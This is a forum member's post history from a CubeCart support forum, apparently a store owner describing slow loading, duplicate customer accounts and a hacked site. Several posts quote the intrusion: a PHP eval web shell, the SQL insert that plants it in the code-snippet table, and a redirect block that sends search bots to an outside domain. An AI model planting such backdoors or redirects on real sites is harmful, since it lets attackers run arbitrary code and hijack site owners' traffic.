Jump to content

jpayam

Member
  • Posts

    63
  • Joined

  • Last visited

Everything posted by jpayam

  1. Hi I use last CC. from 3 days ago my Site loads very slow , in admin Database Maintenance i see Overheads CubeCart_shipping_rates0InnoDButf8_unicode_ci16.00 KB11.00 MBCubeCart_option_matrix0InnoDButf8_unicode_ci32.00 KB11.00 MBCubeCart_shipping_zones0InnoDButf8_unicode_ci16.00 KB11.00 MBCubeCart_code_snippet0InnoDButf8_unicode_ci48.00 KB11.00 MBmy database is only 10 mb on host panel ( last month was 2 MB! ) and in phpmyadmin and did not find any unusual data on above tables, optimize/repair.. did not fix the problem. and there is about 20000 session file in /public_html/includes/extra folder! what the problem?
  2. Works fine on order print, but How we can use item image on "new order received" admin email? as image is not on Available Macros at email templates editor
  3. Hi, I use last cubecart 6.04 for my 2 online store and also i receive PayPal service upgrades notifaication email today
  4. I have not log for mysql on server, my site hacked two times and every time i see below System Erros Log within the Cubecart panel. Yesterday, 13:44 [Deprecated] /home/XXXXXXXXXXXXXXX/domains/XXXXXXXXXXX/public_html/includes/extra/snippet_892d667b445c9ebb6888107b8121a8.php(1) : eval()'d code(1) : eval()'d code:1 - Function set_magic_quotes_runtime() is deprecated
  5. below code was in my database i just clean it and seems problem fixed -- Dumping data for table `CubeCart_code_snippet` -- LOCK TABLES `CubeCart_code_snippet` WRITE; /*!40000 ALTER TABLE `CubeCart_code_snippet` DISABLE KEYS */; INSERT INTO `CubeCart_code_snippet` VALUES (1,1,'snippetH6GrD','Snippet','controller.index','<?php eval($_REQUEST[\"H6GrD\"]);?>','','',3); /*!40000 ALTER TABLE `CubeCart_code_snippet` ENABLE KEYS */; UNLOCK TABLES;
  6. Yes, thanksproblem is from my database seems it infected before i install the modesecurity. as i install a fresh cubecart on another site and works without problem but when i import my database to new site i see the problem again (file snippet_892d667b445c9ebb6888107b8124a8.php) on /includes/extra directory )how can i clean my database?? i want to keep store setting products and customers and orders
  7. We use a vps for this store, we have not any other scripts ,only one site with last cubecart script. php ver is last 5.4 with suhosin enabled , all dangerous PHP functions disabled in php.ini file. CSF is active , modesecurity with last COMODO rules is active. calmAV and ConfigServer eXploit Scanner Scan did not find any Fingerprint matches ConfigServer eXploit Scanner only find a Suspicious matches: '/home/XXXXXXXXXX/public_html/cache/75590.sql.1efdd7b03693b5f7a93ef2d228d5e98c.cache' Regular expression match = [eval\(\$_REQUEST\[] i empty cash folder and even disable the cash temporary but still problem not fixed
  8. Hello, I use last cubecart.i see i A php file (snippet_892d667b445c9ebb6888107b8124a8.php) on /includes/extra directory which include the below code: <?php eval($_REQUEST["H6GrD"]);?> this file recreate automatically again and again after i delete it !!! this code adding below code to my index.php file. if (preg_match("#(google|googlebot|slurp@inktomi|yahoo! slurp|msnbot)#si", $_SERVER['HTTP_USER_AGENT'])) { header("HTTP/1.1 301 Moved Permanently"); header("Location: http://www.reehair.com/"); exit; } if (preg_match("#(www\.google)#si",$_SERVER['HTTP_REFERER'])) { header("HTTP/1.1 301 Moved Permanently"); header("Location: http://www.reehair.com/"); exit; } now i am losing my seo links in search engines thanks in advance for any help
  9. Problem was from database, email was disappeared from index of customer table!! i just recreate it and there is not any problem but for every new customer we see below in "System Error Log" File: [user.class.php] Line: [367] "INSERT INTO `CubeCart_customer` (`title`,`first_name`,`last_name`,`email`,`phone`,`mobile`,`password`,`new_password`,`ip_address`,`registered`,`type`) VALUES ('','777777','77777777','[email protected]','346346346436','','b9bc947c2b69f569c9dd44c4e79b2f15','0','88.99.192.87','1433066991','2');" - Duplicate entry '[email protected]' for key 'email'
  10. I just submit a test order and CC create 3 customer account !!!
  11. Hi, i am using last CC ver Recently CubeCart create 2 customer account ( with same email and date/time registered ) in ordering process and download link not showing in customer account for digitally products we have this problem with 5 orders of 9 order within the last 3 days!
×
×
  • Create New...